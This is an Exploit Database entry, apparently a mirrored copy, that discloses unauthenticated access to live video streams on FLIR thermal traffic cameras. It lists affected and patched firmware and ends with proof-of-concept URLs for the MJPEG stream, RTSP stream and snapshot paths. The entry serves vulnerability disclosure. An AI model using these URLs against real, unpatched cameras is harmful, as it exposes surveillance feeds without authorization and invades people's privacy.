FLIR Thermal Traffic Cameras 1.01-0bb5b27 – RTSP Stream Disclosure

• Exploit Database
• 118 阅读

• 作者： LiquidWorm
  日期： 2018-10-06
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45537/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure # Author: Gjoko 'LiquidWorm' Krstic # Date: 2018-10-06 # Vendor: https://www.flir.com # Link: https://www.flir.com/security/best-practices-for-cybersecurity/ # CVE: N/A # Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)   # Affected firmware version: V1.01-0bb5b27 (TrafiOne) Codename: TrafiOne # E1.00.09(TI BPL2 EDGE) Codename: TIIP4EDGE # V1.02.P01 (TI x-stream)Codename: TIIP2 # V1.05.P01 (ThermiCam)Codename: ThermiCam # V1.04.P02 (ThermiCam)Codename: ThermiCam # V1.04 (ThermiCam)Codename: ThermiCam # V1.01.P02 (ThermiCam)Codename: ThermiCam # V1.05.P03 (TrafiSense) Codename: TrafiSense # V1.06 (VIP-IP) Codename: VIP-IP # V1.02.P02 (TrafiRadar) Codename: TrafiRadar   # Vendor patched firmware version: # # Product nameFirmwareReleased # ---------------------------------------------------- # ThermiCam / TrafiSenseE1.06.0317.09.2018 # TI BPL2 EDGEV1.00 17.09.2018 # TI x-stream E1.03.0217.09.2018 # TrafiOneE1.02.0217.09.2018 # ----------------------------------------------------   # Description # FLIR thermal traffic cameras suffer from an unauthenticated and unauthorized # live RTSP video stream access.   # Advisory ID: ZSL-2018-5489 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php   # Simple PoC:   http://Target/live.mjpeg?id=1   rtsp://Target/mpeg4   http://Target/snapshot.jpg